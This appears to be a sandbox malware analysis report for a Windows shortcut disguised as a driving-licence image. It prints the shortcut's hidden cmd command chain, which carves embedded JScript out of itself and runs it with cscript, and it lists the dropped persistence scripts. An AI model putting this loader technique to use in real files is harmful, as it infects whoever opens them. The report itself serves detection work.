File name: | drivig license.png.lnk |
Full analysis: | https://app.any.run/tasks/302f9c64-e7d9-4317-ba4b-d9c024adc300 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 08:10:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=2, Archive, ctime=Tue Feb 13 03:43:24 2018, mtime=Tue Feb 13 03:43:24 2018, atime=Tue Feb 13 03:43:24 2018, length=302592, window=hidenormalshowminimized |
MD5: | DBD6C4CB1F9B090AEC34723000A602AF |
SHA1: | 482533EB9A27E1F8D4BE5EAA5EF476571D9CA0E2 |
SHA256: | A462A146D86F78C73364D646FFFB8EF8CDE68E1E11FAFC89BC7B862E9B48DE6B |
SSDEEP: | 24576:sZUvLfsyzKVKwOwFhj/40hIPr9dTJU27eTEl3:sZVyzRQt4fdTJl7uEl3 |
.lnk | | | Windows Shortcut (100) |
---|
Flags: | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString, TargetMetadata |
---|---|
FileAttributes: | Archive |
CreateDate: | 2018:02:13 05:43:24+01:00 |
AccessDate: | 2018:02:13 05:43:24+01:00 |
ModifyDate: | 2018:02:13 05:43:24+01:00 |
TargetFileSize: | 302592 |
IconIndex: | 2 |
RunWindow: | Show Minimized No Activate |
HotKey: | (none) |
TargetFileDOSName: | cmd.exe |
DriveType: | Fixed Disk |
VolumeLabel: | - |
LocalBasePath: | C:\Windows\System32\cmd.exe |
RelativePath: | ..\..\..\Windows\System32\cmd.exe |
CommandLineArguments: | /c path=%windir%\system32&&move "drivig license.png.lnk " "%tmp%\1.lnk"&forfiles /P "%tmp%" /M "driv*.lnk" /S /D 0 /C "%comspec% /c move @path %tmp%\1.lnk"&type "%tmp%\1.lnk"|find "BC7D">"%tmp%\0.js"|rd a||cSCripT "%tmp%\0.js" |
IconFileName: | %ProgramFiles%\Windows NT\Accessories\wordpad.exe |
MachineID: | win-11nvmud2d59 |
FillAttributes: | 0x07 |
PopupFillAttributes: | 0xf5 |
ScreenBufferSize: | 1 x 1 |
WindowSize: | 1 x 1 |
WindowOrigin: | 65532 x 65532 |
FontSize: | 8 x 12 |
FontFamily: | Modern |
FontWeight: | 400 |
FontName: | Terminal |
CursorSize: | 25 |
FullScreen: | No |
QuickEdit: | No |
InsertMode: | Yes |
WindowOriginAuto: | No |
HistoryBufferSize: | 50 |
NumHistoryBuffers: | 4 |
RemoveHistoryDuplicates: | No |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2556 | "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "drivig license.png.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"|find "BC7D">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\admin\AppData\Local\Temp\0.js" | C:\Windows\System32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3472 | forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk" | C:\Windows\system32\forfiles.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ForFiles - Executes a command on selected files Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4032 | C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\admin\AppData\Local\Temp\1.lnk"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3808 | find "BC7D" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2388 | C:\Windows\system32\cmd.exe /S /D /c" rd a" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2896 | cSCripT "C:\Users\admin\AppData\Local\Temp\0.js" | C:\Windows\system32\cscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2908 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
292 | "C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js | C:\Windows\System32\cscript.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2468 | "C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Local\Temp\reportapi.js | C:\Windows\System32\cscript.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2896 | cscript.exe | C:\Users\admin\AppData\Local\Temp\drivig license.png | image | |
MD5:CAEF19A73A018864968FD0D28A9BD2B0 | SHA256:355EF09EE7A428A80E24F957A3C21680755FBD576EABD5C7F9B8DE688A92EBD8 | |||
292 | cscript.exe | C:\Users\admin\AppData\Local\Temp\reportapi.js | text | |
MD5:615324F675BC8325A3E03EA30E237B10 | SHA256:DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210 | |||
3808 | find.exe | C:\Users\admin\AppData\Local\Temp\0.js | text | |
MD5:615324F675BC8325A3E03EA30E237B10 | SHA256:DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210 | |||
2556 | cmd.exe | C:\Users\admin\AppData\Local\Temp\1.lnk | lnk | |
MD5:DBD6C4CB1F9B090AEC34723000A602AF | SHA256:A462A146D86F78C73364D646FFFB8EF8CDE68E1E11FAFC89BC7B862E9B48DE6B | |||
2896 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js | text | |
MD5:615324F675BC8325A3E03EA30E237B10 | SHA256:DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210 |